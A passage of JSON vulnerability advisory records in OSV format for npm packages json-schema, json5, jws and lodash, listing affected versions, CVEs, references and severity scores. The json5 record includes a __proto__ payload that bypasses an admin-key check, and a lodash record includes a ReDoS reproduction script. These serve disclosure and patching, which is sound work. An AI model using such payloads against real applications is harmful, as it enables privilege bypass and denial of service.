Pollution", "details": "json-schema before version 0.4.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "affected": [ { "package": { "name": "json-schema", "ecosystem": "npm", "purl": "pkg:npm/json-schema" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-896r-f27r-55mw/GHSA-896r-f27r-55mw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/22f146111f541d9737e832823699ad3528ca7741" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa" }, { "type": "PACKAGE", "url": "https://github.com/kriszyp/json-schema" }, { "type": "WEB", "url": "https://huntr.dev/bounties/bb6ccd63-f505-4e3a-b55f-cd2662c261a9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00013.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250117-0004" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-11-15T22:44:27Z", "nvd_published_at": "2021-11-13T09:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9c47-m6qq-7p4h", "published": "2022-12-29T01:51:03Z", "modified": "2024-02-13T21:31:39Z", "aliases": [ "CVE-2022-46175" ], "summary": "Prototype Pollution in JSON5 via Parse Method", "details": "The `parse` method of the JSON5 library before and including version `2.2.1` does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object.\n\nThis vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.\n\n## Impact\nThis vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.\n\n## Mitigation\nThis vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.\n\n## Details\n \nSuppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using `JSON5.parse`, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:\n \n```js\nconst JSON5 = require('json5');\n\nconst doSomethingDangerous = (props) =\u003e {\n if (props.isAdmin) {\n console.log('Doing dangerous thing as admin.');\n } else {\n console.log('Doing dangerous thing as user.');\n }\n};\n\nconst secCheckKeysSet = (obj, searchKeys) =\u003e {\n let searchKeyFound = false;\n Object.keys(obj).forEach((key) =\u003e {\n if (searchKeys.indexOf(key) \u003e -1) {\n searchKeyFound = true;\n }\n });\n return searchKeyFound;\n};\n\nconst props = JSON5.parse('{\"foo\": \"bar\"}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props); // \"Doing dangerous thing as user.\"\n} else {\n throw new Error('Forbidden...');\n}\n```\n \nIf the user attempts to set the `isAdmin` key, their request will be rejected:\n \n```js\nconst props = JSON5.parse('{\"foo\": \"bar\", \"isAdmin\": true}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props);\n} else {\n throw new Error('Forbidden...'); // Error: Forbidden...\n}\n```\n \nHowever, users can instead set the `__proto__` key to `{\"isAdmin\": true}`. `JSON5` will parse this key and will set the `isAdmin` key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:\n \n```js\nconst props = JSON5.parse('{\"foo\": \"bar\", \"__proto__\": {\"isAdmin\": true}}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props); // \"Doing dangerous thing as admin.\"\n} else {\n throw new Error('Forbidden...');\n}\n ```", "affected": [ { "package": { "name": "json5", "ecosystem": "npm", "purl": "pkg:npm/json5" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9c47-m6qq-7p4h/GHSA-9c47-m6qq-7p4h.json" } }, { "package": { "name": "json5", "ecosystem": "npm", "purl": "pkg:npm/json5" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9c47-m6qq-7p4h/GHSA-9c47-m6qq-7p4h.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46175" }, { "type": "WEB", "url": "https://github.com/json5/json5/issues/199" }, { "type": "WEB", "url": "https://github.com/json5/json5/issues/295" }, { "type": "WEB", "url": "https://github.com/json5/json5/pull/298" }, { "type": "WEB", "url": "https://github.com/json5/json5/commit/62a65408408d40aeea14c7869ed327acead12972" }, { "type": "WEB", "url": "https://github.com/json5/json5/commit/7774c1097993bc3ce9f0ac4b722a32bf7d6871c8" }, { "type": "PACKAGE", "url": "https://github.com/json5/json5" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-29T01:51:03Z", "nvd_published_at": "2022-12-24T04:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gjcw-v447-2w7q", "published": "2020-09-01T15:23:18Z", "modified": "2023-11-08T03:58:07.352660Z", "aliases": [ "CVE-2016-1000223" ], "summary": "Forgeable Public/Private Tokens in jws", "details": "Affected versions of the `jws` package allow users to select what algorithm the server will use to verify a provided JWT. A malicious actor can use this behaviour to arbitrarily modify the contents of a JWT while still passing verification. For the common use case of the JWT as a bearer token, the end result is a complete authentication bypass with minimal effort.\n\n\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jws", "ecosystem": "npm", "purl": "pkg:npm/jws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-gjcw-v447-2w7q/GHSA-gjcw-v447-2w7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000223" }, { "type": "WEB", "url": "https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e" }, { "type": "WEB", "url": "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries" }, { "type": "PACKAGE", "url": "https://github.com/brianloveswords/node-jws" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jws:20160726" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/88" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:10:22Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-29mw-wpgm-hmr9", "published": "2022-01-06T20:30:46Z", "modified": "2025-09-29T21:12:31.102523Z", "aliases": [ "CVE-2020-28500" ], "summary": "Regular Expression Denial of Service (ReDoS) in lodash", "details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n var ret = \"1\"\n for (var i = 0; i \u003c n; i++) {\n ret += \" \"\n }\n return ret + \"1\";\n}\nvar s = build_blank(50000) var time0 = Date.now();\nlo.trim(s) \nvar time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0);\nvar time1 = Date.now();\nlo.toNumber(s) var time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1);\nvar time2 = Date.now();\nlo.trimEnd(s);\nvar time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2);\n```", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash.trimend", "ecosystem": "npm", "purl": "pkg:npm/lodash.trimend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.5.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash.trim", "ecosystem": "npm", "purl": "pkg:npm/lodash.trim" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.5.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "versions": [ "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28500" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/6139" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/5065" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1018905" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210312-0006" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T22:45:28Z", "nvd_published_at": "2021-02-15T11:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-35jh-r3h4-6jhm", "published": "2021-05-06T16:05:51Z", "modified": "2025-08-12T21:55:57.719943Z", "aliases": [ "CVE-2021-23337" ], "summary": "Command Injection in lodash", "details": "`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash.template", "ecosystem": "npm", "purl": "pkg:npm/lodash.template" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-template", "ecosystem": "npm", "purl": "pkg:npm/lodash-template" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23337" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1040724" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210312-0006" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-77", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T23:59:26Z", "nvd_published_at": "2021-02-15T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4xc9-xhrj-v574", "published": "2019-02-07T18:16:48Z", "modified": "2025-08-12T21:55:35.778975Z", "aliases": [ "CVE-2018-16487" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.11 are vulnerable to prototype pollution. \n\nThe vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.11 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-4xc9-xhrj-v574/GHSA-4xc9-xhrj-v574.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.11" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-4xc9-xhrj-v574/GHSA-4xc9-xhrj-v574.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16487" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad" }, { "type": "WEB", "url": "https://hackerone.com/reports/380873" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0004" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:59:41Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-fvqr-27wr-82fm", "published": "2018-07-26T15:14:52Z", "modified": "2025-08-12T21:55:16.003066Z", "aliases": [ "CVE-2018-3721" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. \n\nThe vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.5 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-fvqr-27wr-82fm/GHSA-fvqr-27wr-82fm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.5" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.2", "4.17.4", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-fvqr-27wr-82fm/GHSA-fvqr-27wr-82fm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3721" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a" }, { "type": "WEB", "url": "https://hackerone.com/reports/310443" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0004" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-471" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:35:26Z", "nvd_published_at": "2018-06-07T02:29:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jf85-cpcp-j695", "published": "2019-07-10T19:45:23Z", "modified": "2025-08-12T21:56:37.293794Z", "aliases": [ "CVE-2019-10744" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.12 are vulnerable to Prototype Pollution. The function `defaultsDeep` allows a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n## Recommendation\n\nUpdate to version 4.17.12 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.14" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-amd", "ecosystem": "npm", "purl": "pkg:npm/lodash-amd" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.13" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash.defaultsdeep", "ecosystem": "npm", "purl": "pkg:npm/lodash.defaultsdeep" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.12" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/4336" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3024" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0005" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-450202" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2019-07-10T19:41:11Z", "nvd_published_at": "2019-07-26T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p6mc-m468-83gw", "published": "2020-07-15T19:15:48Z", "modified": "2025-08-12T21:56:17.174859Z", "aliases": [ "CVE-2020-8203" ], "summary": "Prototype Pollution in lodash", "details": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions `pick`, `set`, `setWith`, `update`, `updateWith`, and `zipObjectDeep` allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ 